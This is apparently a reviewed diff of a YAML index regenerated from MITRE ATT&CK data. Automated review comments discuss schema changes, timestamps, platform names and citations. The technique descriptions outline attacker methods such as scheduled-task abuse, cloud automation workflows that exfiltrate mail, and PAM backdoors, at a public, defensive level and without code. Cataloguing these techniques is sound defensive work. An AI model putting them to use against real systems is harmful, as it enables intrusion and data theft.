Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -26303,21 +26665,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
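Review bot: `- spec_version: '2.1'` is deleted for T1203 and T1059.006 here with no replacement key, and the same deletion recurs on every object in this diff. If the generator deliberately stopped copying the STIX `spec_version` through, say so in the PR description, because readers of this index that keyed on it now get a missing key instead of `'2.1'`. The rest of the T1203 changes (`+ - 'File: File Modification'`, `+ - 'Network Traffic: Network Traffic Flow'`, `x_mitre_version` to `'1.4'`, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, a new `revoked: false`) should all be verbatim copies from the upstream ATT&CK STIX bundle rather than hand edits, so naming the ATT&CK release the regeneration ran against would let reviewers spot-check them.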
@@ -26367,28 +26745,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests: []
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -26399,32 +26760,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
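Review bot: `x_mitre_permissions_required` (User, Administrator, SYSTEM, root) is removed from T1569 with nothing taking its place, and the same field disappears from T1204.001 (`- User`) and T1556.003 (`- root`) further down, while T1546.006 keeps a `- User` list entry beside its untouched `x_mitre_attack_spec_version: 2.1.0`. Anything that filters atomic tests by a technique's required privilege will therefore find the field on some techniques and not others; either drop that dependence or document that it is only populated on objects still at attack spec 2.1.0. The `x_mitre_modified_by_ref` deletion near the top of the object paired with its re-insertion at the bottom is a pure key reorder and is fine.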
@@ -26467,12 +26840,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests: []
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26529,11 +26901,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26598,14 +26969,13 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests: []
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26626,14 +26996,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
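Review bot: the two citation tags added to the description, `(Citation: Cloud Hack Tricks GWS Apps Script)` and `(Citation: OWN-CERT Google App Script 2024)`, only resolve if `external_references` entries with exactly those `source_name` strings exist; they are added two hunks below with matching names, so the citations check out. The second tag is split across lines (`(Citation:` at the end of one line, `OWN-CERT …` at the start of the next) inside a double-quoted YAML scalar, which is safe because YAML folds that break into a single space. The relocated `+ x_mitre_attack_spec_version: 3.2.0` after `kill_chain_phases` pairs with the `- x_mitre_attack_spec_version: 3.2.0` removal at the object's tail further down, so the key is moved, not duplicated.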
@@ -26642,16 +27017,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
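Review bot: `- Office 365` to `- Office Suite` under `x_mitre_platforms` changes the string that any platform-scoped index generation matches on. If this repository derives per-platform index files by filtering on the platform name, T1648 will silently drop out of an Office 365 index after this change, so the index generator or its platform-name mapping should be updated in the same PR, or the rename confirmed as the intended upstream ATT&CK platform consolidation. The `x_mitre_version` bump to `'1.1'`, the `+ - OWN` contributor and the moved `x_mitre_modified_by_ref` line are consistent with the new Google Workspace paragraph in the description.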
@@ -26677,6 +27054,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -26691,29 +27076,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -26726,25 +27092,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
@@ -26794,17 +27176,16 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -26867,7 +27248,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -26901,8 +27282,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -26911,6 +27292,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
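Review bot: the new `url:` for `Malicious Life by Cybereason` ends in `#blog-subscribe`, which anchors to the page's subscription widget rather than the article; the reference should point at `https://www.cybereason.com/blog/wmi-lateral-movement-win32` without the fragment. If this value is copied verbatim from the upstream ATT&CK STIX, leave it here and raise it upstream instead, since a local edit would be overwritten on the next regeneration. The `source_name` matches the `(Citation: Malicious Life by Cybereason)` tag added to the T1053.002 description above, so the citation resolves.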
@@ -26923,29 +27308,29 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
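Review bot: the sentence about the deprecated `at` utility is dropped from the description (`- though at.exe` and `- or the Control Panel.\n\nAn adversary…` are removed), yet the line between them, `can not access tasks created with schtasks`, is shown as unchanged context. That is most likely the diff view splitting one folded YAML line at the `at.exe` / `schtasks` inline-code boundaries rather than a real surviving fragment, but because this is a double-quoted folded scalar, an orphaned unquoted fragment would break the YAML load; please confirm the regenerated file parses cleanly and that the new text reads `…Panel.(Citation: Stack Overflow) In some cases…` with no stray clause. `Powershell Cmdlet` is inconsistent capitalisation for "PowerShell cmdlet", but as upstream ATT&CK text it belongs in an upstream fix, not here.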
@@ -26992,7 +27377,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -27024,8 +27409,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27039,6 +27424,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -27051,16 +27440,19 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
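Review bot: `modified` for T1205.002 moves backwards, from `'2022-11-08T14:00:00.188Z'` to `'2022-10-20T19:56:18.579Z'`, and the same regression appears for T1133 (`2023-05-09` to `2023-03-30`) and T1546.006 (`2022-05-11` to `2022-04-20`) later in the diff. The old values all share the `14:00:00.188Z` time, which looks like a bulk release timestamp, while the new ones have object-level precision, so this is probably the generator now reading each object's own `modified` field; that is an improvement, but any consumer that treats a non-increasing `modified` as "unchanged" or caches on it should be checked, and the PR description should state which ATT&CK STIX release these three objects were taken from. The `- source_name: Stack Overflow` entry resolves the `(Citation: Stack Overflow)` tag added to the T1053.005 description.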
@@ -27123,7 +27515,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037:
technique:
@@ -27188,49 +27579,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -27245,20 +27597,57 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
